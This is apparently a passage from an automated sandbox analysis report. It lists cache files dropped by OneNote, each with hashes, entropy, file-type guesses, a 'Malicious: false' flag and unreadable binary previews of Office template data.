Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7271254559272573
Encrypted:	false
SSDEEP:	12:KUC+/Emu6lEs5Bt+3tqbVeIWeW7eIWc19mQEj:KUT/EmHlEa43io7K
MD5:	79FBDC4FD9B1C909298E2C5DB299E864
SHA1:	B7A4C1B9419CC99ACD4CFF96584EB17FD9593152
SHA-256:	98159B67FACF344EA6E5C04D353675CF1E197DC9163AD574F5D7ACEA0EAA1ECC
SHA-512:	882C76D587B594262E250D39326B5DF4AAE8CE51A951EC0A5D3B4434326B2060C9D14CF3871750D696C4BA95B324CADC29F8D9FE38FA6B86E0EB31FDA541AEA8
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................l.......l!..@...!zS...........B.(.C... .5...l!..@...!zS...l....B.(.C... .5....................................l.......l...................................................l.."....l\......lN.........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................l..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........{T.....M...Fh-......N...^...........................................................................................................{T.....M...Fh-......................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4804700990475034
Encrypted:	false
SSDEEP:	6:NTcW/lEOCte2ldyLx8Olu3afpAUA2Mlcw1EqBUA2ClK:VcEgeCV38kTlcQEwK
MD5:	EDC613C4D4B1953C85F8D939583C2BF2
SHA1:	ADCFC35969020995B7664600CE5D138A3C454B22
SHA-256:	AE9B4FEDFC8CE2E85D0497AF50533EE5BABD4346EE0F4AFC2DC54F591EA6394B
SHA-512:	70B4095117346DB440FE479C079EE5209779279314454646D8A641D9124348F6E552DC8CED8ABB1CDDEF1F1473097ABD8C369161E85F9EF57BE004288FEDD295
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................M.......M..4./@..m.f............................M..4./@..m.f...M....................................................M.......M...................................................M.......M.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...:..H..C..,%.h......N...^...........................................................................................................:..H..C..,%.h..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.647484725143067
Encrypted:	false
SSDEEP:	6:UWBE8m2VR2c/0rXfUrLx88cbrMkq2Sz1MQQcbrMkq2Sz157NYw1EW7Nk:UeEgdcAjnkNYKQQnkNY/NYQEiNk
MD5:	95E4A0409FFC8163924051939E25E4AD
SHA1:	E47AB17658E18A6AD13B29DAA9CE2BD126D9A4BC
SHA-256:	6008524800AA048D4ACAA1633F629AF7514BB6B6B98DF469826002D040750520
SHA-512:	93EC43822E3CB2092D8836B39A53A715F8C62E1A659FEC44D2D22C2588F44AC1A214708763E4620DE9A73032504158B78DF5A1D0AEDE326B453DE805EE4F32CA
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................X.;.....X.;..pA.......d........................X.;..pA.......dX.;..................................................X.;.....X.;.................................................X.;.."..X.;\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.........a..D...N..:._sa.....N...^...........................................................................................................a..D...N..:._sa.............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7936891565104932
Encrypted:	false
SSDEEP:	12:+wfExqElZZsFlwl/lZjZmLDsD43wsD4CLiQEOa:+5qGZYlwlTjZ4n3wnuiy
MD5:	E58BBCA57C62619E30634AF5BB385DDF
SHA1:	70DC03556E82ABA25CE823A8963797D29DD9BB20
SHA-256:	C54CC1C5822F2AAB132D75302192E914EFA9F9A721998C100D8042D5576E09D1
SHA-512:	160D7189588BBEA41B6EF5C975E3B7D918ED0B974872E089828A1224FE95F7C592BA132FA606E33F25B631A4036F0734F7BB02FF092C81438AA33C9BBD4804FE
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................$.......$.j.I..^N..l2..h.......h...OE...K...>..h...OE...K...>..h...$.j.I..^N..l2..$................................h.......h...................................................h..#....h\......hN......................................................$..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................h..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............M.t.89.......N...^................................................................................................................M.t.89.......................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4847905959826573
Encrypted:	false
SSDEEP:	6:NTcQ/MqBT65PBTgKl/YUYjeyLx8Olu3afTrlww1EOsLrlM:Vc9suvl/HV38/iQED3a
MD5:	D902A65598FCA84FFF841D98273AC1D6
SHA1:	77AFDC4EB1824A93485D35D0C1835DB0BC702195
SHA-256:	AA0E3A4B671A9FE77A998987EA8D5D9718858EBB4ADB4025CEF2615124BC8D6D
SHA-512:	AD22FB1FE012446534D1A5019A541868E96DC12B331816541064897CB168339F9E8C5B6854A5894A3240141A5A96ED59025FB39E0766F9F17B7C06CF989FFF6C
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................r{P.....r{P..6.I................................r{P..6.I........r{P..................................................r{P.....r{P.................................................r{P.....r{P\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...^.y...\E.dU.........N...^...........................................................................................................^.y...\E.dU.................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4558209987553303
Encrypted:	false
SSDEEP:	12:RpX8ykfiE06v8Cw4N4qXD1MCDuYYzmTGPY9iwIWscecQEwXi9cn:vXwwoSCbYzm2Y9/sqEA
MD5:	3F4C4C9598199C5F57B981784FC45C05
SHA1:	80DDE3E3EE51089021F0DF1F7EB42751D16517B5
SHA-256:	7B7A120ADF527AE999ABCC283894E6301E41B69BEE3EAE7EB5AADF8629BC6CE6
SHA-512:	BB551FDDBAC038AFC0103881157584D0CF8CF5F2F132815835E486E3DA6C8EB182C4E5E95F4AF01593A97641761AB8CAC8C673C474BAE70E9961D273B6C1AC61
Malicious:	false
Preview:	........ ...........................................................................................................................................................................................................SJKJ...@?.G.q~T.....q~T..d.D..d.I[@..,...?@....x;NN.,.q~T..d.D..d.I[@.q~T......G.K.....u.6.............q~T.....q~T.................................................q~T..@..q~T\....q~TN....q~TN.)..q~TN.6..q~TN.>..........................w....c..,.........................4..1...(...(.......U.s.e.r........q~T..1... ..$....U.s.e.r...........w.......w...n..H..G...<R.............G.K.....u.62...................................q~T.......................................c..,...................q~T.q~T..1... ..$....U.s.e.r.......w...n..H..G...<Rw.......SJKJ...@?.G..........G.K.....u.6........>...............q~T..d.D..d.I[@...........................................,..c..,...................q~T.q~T.q~T..1... ..$....U.s.e.r............,.....*.,...?@....x;NNq~T.....q~T..d.D..d.I[@.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7112180439240621
Encrypted:	false
SSDEEP:	6:jxfES5WYr1f8zn8f8z/wtuiodC0x8CAXCknnWWAXl6dIYXrw1E9dIYXn:KO8q8kthYWXnW9XlcIY7QEXIY3
MD5:	5FC0ABE93AF7CE59348A8E30C269CAEC
SHA1:	13290D252F6CC176FBF2F2EE89738C20E5E66A87
SHA-256:	59F39805EC860E382EEDC781DEF5A1A06C2123D8E690C047C02994668B204EC3
SHA-512:	1FD2C1D3E81EDF7EAEAF24C362B3CCD4840B18CE2212BF8376D9A0472D93ADF23A887B2F7953D342034FF1957BE813FA35018FD6293AC7A033DB2F9746C23535
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................]......].c..I.3.4...a.......a.. e.C.:7s.....a.. e.C.:7s.....a...].c..I.3.4...]...............................a.......a...................................................a...!...a.\.....a.N.....................................................]..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........a...1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.............)...-.mI...Qp......N...^...........................................................................................................)...-.mI...Qp..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4838140334826573
Encrypted:	false
SSDEEP:	6:NTc+3lFmc4f+f/m75JlyLx8Olu3afh8oxmw1EuE8o/0:VcOL4f+f/m7LlV38HxmQEjM
MD5:	D49375AD90004F8FE85FADF9D398805D
SHA1:	92E703B8C5779D479FB40FFB9F1EFF6774700092
SHA-256:	3A966174479454F6450BF00B61E50AFC89B173C2F83E4BFF84F553FE4363CCA8
SHA-512:	759767F2307AC9B1E8FBAD05EF9A693CD6B068B1C12AFA9F203C2F649D7DB47B30D5492C6C5A9D2594FBBF33ADC99FA4F6D4145C84FA26B2CB365751FC5105E8
Malicious:	false
Preview:	2...>...........~....................................................................................................................................................................................................x}E..5;(..............................x}E..5;(.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....SP...kO..Ze.,......N...^............................................................................................................SP...kO..Ze.,..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7352923879375559
Encrypted:	false
SSDEEP:	6:K0nCHwL5Wj+YWAPpdh9+YPXGlLMsEtHlc/sqxrx+Xx8felBkls0Cv1D7elBkls0e:KUCe5WFPNclV/ngQeIWJ7eIWc1GQEag
MD5:	23C9849E64391464B12F39218AD8804E
SHA1:	0260C89D7C0579F4768338AB54A048A2251F36B8
SHA-256:	F8CD4606E30FB391FEC0C7A965B56523EECCB8C4E8D11FCBFCBC5C5253394963
SHA-512:	13DED86370DCA6058C78F767187D1E3799C1A9B4CFAA3FF4593CACC890017591D8A8FE4AD35FE6313F200EA83DBFD77581DB56AEB6C4753C8CB6AE108767C248
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................-X......-X..}.L........v......v..D\|CO..[..qH..-X..}.L.........-X.v..D\|CO..[..qH.v...............................v......v..................................................v..."..v.\....v.N.....................................................-X..c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............v...1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........`& .Z.}D....h.kd....N...^...........................................................................................................`& .Z.}D....h.kd....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48277285611290854
Encrypted:	false
SSDEEP:	6:NTch4BJqKQ8R4BJqnEpB4ayLx8Olu3afd9cqw1EoI9cS:Vch4Bw8R4Bf4aV38d6qQEoI6S
MD5:	90F99DC6534202512160A9396C1BF6BF
SHA1:	CBAC4DD8C8BE1C438B0DE784A7080EC3E5E7748E
SHA-256:	818930948CFE325B1619CB4E36A70227FEB1188733EF83F31484C1FB0ADA78D8
SHA-512:	7066CCB2D1AACBBB3345BCEE148DA7314A230BED492ECCC793811BD41D32295A8FDE2A2F8A53C74C7A70B8CCDEA74ED7207B8148A1B38578D951431D841AC8B8
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................$.......$.....B..l.T...........................$.....B..l.T...$....................................................$.......$...................................................$.......$..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...x.J....M.......v....N...^...........................................................................................................x.J....M.......v............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6489251876747785
Encrypted:	false
SSDEEP:	12:UeEg/GsLsMWua+nkNYKQQnkNYU1pQEP1SK:Uie+kNbQQkNH1pb1
MD5:	F1B531BDC992B3174F2F0F4579E95DB0
SHA1:	F8AB1351149C53D429FC8F8F9308B471F7FA5F43
SHA-256:	A6B563EECE7289C6EC921338DD51C32489EF68B01A787A488545699BF785F0C8
SHA-512:	BE370EEEF46AB26CF6FB9ABA2624481BF14C751E21BBD748514D3D31A6B42D7ADC77DC139E164729B401019F0E45F56EFE825E657C1D0B30AA8AB69125F29CBC
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................7C......7C..9H.F.l/i..Q.........................7C..9H.F.l/i..Q.7C...................................................7C......7C..................................................7C..."..7C.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s..........}.....H...=jf......N...^............................................................................................................}.....H...=jf..............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.797344507962055
Encrypted:	false
SSDEEP:	12:+wfEGLLdHUVnHryoo5/sD4nwsD4CcduIQElduU:+eL2VLy15/nnwnFdTL
MD5:	2AE878D272758C6FACBA6441CC48F437
SHA1:	3278EB9D78374DE8F73805A1F9B05554E10B5BC2
SHA-256:	F0FAFFACD6FF91F7D68243A4A2856B68AA43CCC3F3D248B12DC7A38125F99126
SHA-512:	21EE5C226C9F8ACD3EBD40994C5D9B0FADDF422505591369B757D9B5CFCE3158FAA89DFDB3EB806FB17C708EDF3287BFEA5261881A3436215A7F7A09E16551CB
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................,.......,..m.C..t1.sKT.p.......p...tM....[..,..m.C..t1.sKT..,..p...tM....[..p.................................,.......,...................................................,..#....,\......,N.....................................................p...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................,..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........Y..BH.F...........N...^...........................................................................................................Y..BH.F...........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47963448868803715
Encrypted:	false
SSDEEP:	6:NTcWLJkuWJklSlliF6XyLx8Olu3afnRw1EM4B:VceVS/maV38RQEMq
MD5:	458C9C97FB82E0673FDEF3CFE5CC25BC
SHA1:	4F740B7CBCE927F2AA3F64FC8E88FB54BA89D6F2
SHA-256:	4111809A992677EF0E3AB0F9B276D1350E8848120733B7AADC32B4FCFBA3960F
SHA-512:	1C8BA6C5FCCCDFFDB0BB2AAE11AC60F640638789CBC4F6B2C16C686A788F6D823B59840D6CAC3E37B05587F8CF123AB9DA58C0AA96C62C5F89CD0A44B154753F
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................L.......L..S,K..F.Y.iJ..........................L..S,K..F.Y.iJ..L....................................................L.......L...................................................L.......L\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.......00SF..s .W.P....N...^...............................................................................................................00SF..s .W.P............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.0043605762827883
Encrypted:	false
SSDEEP:	12:DKzsRXyWcOFvYtXDwVbS14huprydX+5dkYQE8k:DMCXyl45VbA0akYQ
MD5:	B33B1A6C0AFC9260776CA9F75B1AE9E3
SHA1:	A955AE4A64D99A05A0ABF6393BA32029597550DC
SHA-256:	1C8465BADE3F608D6BB9DC13A4A4DCCC48F1F4A1DBC0E867256B950AC20934B1
SHA-512:	B0EAA9C549017E19472C1828C62FC2CDC650B6369CA697DA5DB6CC61311E431FFAC0C579E93A9DB2B8249B5DEF1598F4829E9CF3171FCF7938EF1C276C6217D0
Malicious:	false
Preview:	....>..........................?......?.................................................................................................................................................................7.......7...U..L...^.9...e;......e;7.1B...C-,..e;7.1B...C-,.e;.3...j.K.j8...K.3...7...U..L...^.9..7............7.......7...................................................7....-..7..\.....e;N.(....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...................e;.. ..$...........e;......e;7.1B...C-,.3.......3...j.K.j8...K.2...............................7........................................3....c..,....................e;.. ..$p............4....J..HD................e;.. ..$p................Mi@..u..<'q.........%E.;B... nHr"....N...^..............................................................................................................%E.;B... nHr"....................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9489162959129714
Encrypted:	false
SSDEEP:	12:BKKmIRhtexlhmDIik13/yulBY5lWTH6erQE/6en:uIomDIieNO5leaerGe
MD5:	58CF24F024B314BCB99E3C9965D166B3
SHA1:	EE95B01629347B13173F92FB6613695F3FF1BA52
SHA-256:	5A060CC8A4F543C7FD262F6F41C5A3FE977EC00E3D789E9B4F72C484E1435D4A
SHA-512:	FB73FB57C82EC56EB81D32390DF22A4C99CDCA7C3AED837B7A7802ADAB2C1847B64CF731B82839031D571E5626401C137A5F52A34CA7E23F810151823FDD88DE
Malicious:	false
Preview:	....>.............................?...?..................................................................................................................................................................V.......V....\O..]....x].......]...C.mD.M....\.]...C.mD.M....\.]....ma./9N.@w'sp...ma..V....\O..]....x.V............V.......V...................................................V...,...V.\.....V.N.....V.N.)............................................4..1...(...(.......1.6........................]....c..,....................V... ..$..........].......]...C.mD.M....\..ma......ma./9N.@w'sp..2................................V........................................ma..c..,....................V...V... ..$............V...V... ..$p............De.q.2M.j.#!C:............)7@=\|.B..w.yU.....N...^............................................................................................................)7@=\|.B..w.yU.....................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5042175539118636
Encrypted:	false
SSDEEP:	24:MAS7B8k060VmatvxlgeB6zMOriNJVWJUHJUFR:MjSu01bgbHiv+2eR
MD5:	07F2252988AE9BB02936FFE462468A39
SHA1:	BEC017D0CFB7A11949306731A6FD93FED252C833
SHA-256:	28ABC8A08BEF5E27FA663325F73D4B644246E5BF458A98DE5AFEE4E95E4AF05B
SHA-512:	0D41C674380B807D1D1D3B95ABCF99263C147A4F5FC1289BCC4DC7289507C46299E84C048E9676FEE45FA82203A8FCB7577B308EB3A2BDA1FE3D80AD4451788F
Malicious:	false
Preview:	........$..................................?............................................................................................................................................................Ak......Ak.Z=?.N...;=...............gH..]...,t.z..J..B.K...7AG.z...a.....C......+ .a.......gH..]...,t..............a.......a...................................................a...@...a.\.....a.N.....a.N.)...a.N.8...a.N.<............................4..1...(...(.......M.a.n.a.g.e.d.......................z...c..,....................a... ..$...........a.......a.....C......+ .z.......z..J..B.K...7A.2....................................a........................................c..,....................a...a... ..$....................H..1...<..z.......z..J..B.K...7AG......H..1...<..........gH..]...,t....Ak.Z=?.N...;=..Ak......>................a.....C......+ ..............................................c..,....................a...a...a... ..$...................Ak...c..,....................a.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7626113472615781
Encrypted:	false
SSDEEP:	6:bEhIJkLtfMj9ItsBX3a1Lx8CAXCV+lk/aue1v7lBMf4Xetqw1EwftS:bEhyqtE/B3a1YXIS1JGf4etqQEEtS
MD5:	98564B42227D680DE62AFBE595DBDCF4
SHA1:	73EB57AC1D94B07D2121FFEB7CFE1C8A818D580E
SHA-256:	9A99ED611D99A593788D27A6666111518360443A58819C693F21DBD9CB5CC915
SHA-512:	B47FF82CBBE5A4EDB6807F61BA2D9986E9E7122A3DCC49C5CFA116115361E9C79110947B0457F31F66E6C7B9C8BA243D9E5C9CDD42FA963DC45D86BB31136846
Malicious:	false
Preview:	2...>..............................................................................................................................................................................................................%...L.0...@.............L.H.....P5....L.H.....P5.......%...L.0...@...................................................................................................#.....\.......N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........................c..,........................ ..$.................... ..$p...............id.A...u.J........ .Y....N..R0-.......N...^........................................................................................................... .Y....N..R0-...............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5217058826682069
Encrypted:	false
SSDEEP:	6:jhzcRlnlBm4NuBth0JkAaq/yLx8Olu34Bjlcw1E5tlK:jRcDREBth0JAq/V3+cQEz0
MD5:	11CEEB52741CE02B94532CDB4FA0C5FD
SHA1:	09C35DCC6E57527CA57C3100427F1A676373F9B2
SHA-256:	DE202B541583D6701B4BE5E5D2DE2DBD27DAFE7BA21AE6DF50101CF9C09330B3
SHA-512:	761D5110AD3CE4BC174136D2C206FEA1FA20C4DD865C7746ECBA3749E61DA248533E8308201E1DD184F0B7A2A0FDDC3344B2E6C9834A7E065B930E2176431E3A
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................g>......g>c9.HI.....c.Q.........................g>c9.HI.....c.Q.g>...................................................g>......g>..................................................g>......g>\..............................................................4..1...(...(.......1.0.3.3.................p........[Z.v:F..;`y................roNJ.a1!..k.....N...^..............................................................................................................roNJ.a1!..k.....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7647438825966435
Encrypted:	false
SSDEEP:	12:D0CoqMZuETZTdMqEZseIWE01jbBbcQE9Bk:QhNul+RAbBbcxB
MD5:	69C584E737B01094382AF14724AAC546
SHA1:	A3BB757ED798B2705260C2974A043709D2BFFACA
SHA-256:	5C9D507D4C4AE5B85BA12CBE1BB4995FFEAEF68E7B29134B124E90DFBCAA4721
SHA-512:	07C906C1F173C49A64D94C0405DE794E2307D65C96798524587D0CD1727B5BB06991734E163B0AD0C2C078829259BFED7FC40A4E7E62C83F0803B300A2AAAE50
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................h.t.....h.t..3rM.....3-.............n.I..1.bP.......n.I..1.bP......h.t..3rM.....3-.h.t...............................................................................................$.....\.......N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........................h.t..c..,........................ ..$.................... ..$p..............[...G....1..o.......k.+...N...\|.u^a....N...^............................................................................................................k.+...N...\|.u^a....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5288265363138713
Encrypted:	false
SSDEEP:	6:jhzcGDwzeRY9lll5oYyHtcDYDuTJlyLx8Olu33qHghqw1EfS:jRcqdRAt5ottsYDIJlV33qMqQEfS
MD5:	20D8ADDFAA6CEF2A18612458B61579E6
SHA1:	8F738645F13BB37095B629B2FBD373B60802D759
SHA-256:	0C5EBE4DC6D9446A4BB8CD3ACD82B9585E1988221D08AE19752CFC5BAA317C2B
SHA-512:	169DCC967B60FF6C4BBFC876217765531943C62C7611F79F51674A2FB7A1DB380BAD7A88C70B784C17BE91DA6DCC316693195B7779854BD93AF928176033FCF4
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................f.......f.v...J...m..K..........................f.v...J...m..K.f....................................................f.......f...................................................f.......f.\..............................................................4..1...(...(.......1.0.3.3.................p.........a..OqF./k7..6...........k.6Mk.]D.......\....N...^...........................................................................................................k.6Mk.]D.......\....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6144161181938137
Encrypted:	false
SSDEEP:	6:90ChaPHltoSowaP8P4nN7QpqELx88cbrMkq2Sz1sm4NXJLqw1EHHLS:eCMP3obvPvdynkNYqm4qQEHrS
MD5:	4D13D57927BE1E77BAC9FCB7949FA208
SHA1:	04B6D9B9700FA086AB42E0D327D842641EEA67F7
SHA-256:	AF96DBF05A13B6EAAFCDB87F750C46200A09A6B3A72C6BB0E93B0767C48FB52D
SHA-512:	11CAE2C4D01FB919040B5157C1B6A82FCCCDECC91094B5C74AEF2421FAF748AE7D5F8635B2ED88C565D3384A30F22FC88F0DF01997D297B2E399C6B15BDC9190
Malicious:	false
Preview:	2...>..................................................................................................................................................................................................................E.p.G..#................................E.p.G..#......................................................................................................................".....\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.......S._08?.H..c.l.............].....I..!,.......N...^............................................................................................................].....I..!,.......................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.809539555761264
Encrypted:	false
SSDEEP:	12:EE8rdFxE4GefZvsD4LYjS1JimETIQE2TFK:wLGeftnLYx/kq
MD5:	5AC9AFADB81D56BBF38202FE491B4EEA
SHA1:	64FE8A11125E6B5AE8A34FDA80CE498728D29CBA
SHA-256:	60C459B8F77A65A82D5D46BFBCC36C008F7BD3D9D8553FBA35BFEF61CB6A369E
SHA-512:	2907CE9F380EC2FB250E0BAAC57DBA0F1332CA131E5425615FFCDB372443EB59A6775827E49D9BCC6CC4DE9A942A4E395C869B6C8B1B02A7F1EDE725FE67E0D4
Malicious:	false
Preview:	2...>..............................................................................................................................................................................................................9..oM./.G+..d.".......".f...O...6Z.....9..oM./.G+..d.....".f...O...6Z..."................................................................................................%.....\.......N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................."...c..,........................ ..$.................... ..$p..............k...E.....c\#.......1\|S..ZM...\|\......N...^............................................................................................................1\|S..ZM...\|\..............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5259500780304734
Encrypted:	false
SSDEEP:	6:jhzcqa/QoH/IQG8FyLx8Olu39Pb1Xs5vYw1E4P5vk:jRc/pQkV39z1GvYQE4hvk
MD5:	D6A1E128764E0FBFB86468E9766C6FBA
SHA1:	27F000238F23513BF390B947BCFE01C6F8872143
SHA-256:	953680050A3EA0F1CF10364598AA3CF0A7DD502283A0553C943083152DB5FB59
SHA-512:	EEEACD65A11AC7BEF482383833BD53F945F9E9F2BBB85E190F20D78533CD2497E83DD4B21F0D3ED1FFA00DCEF1C947A03616879C45CDF075482E88B53DFE5D4C
Malicious:	false
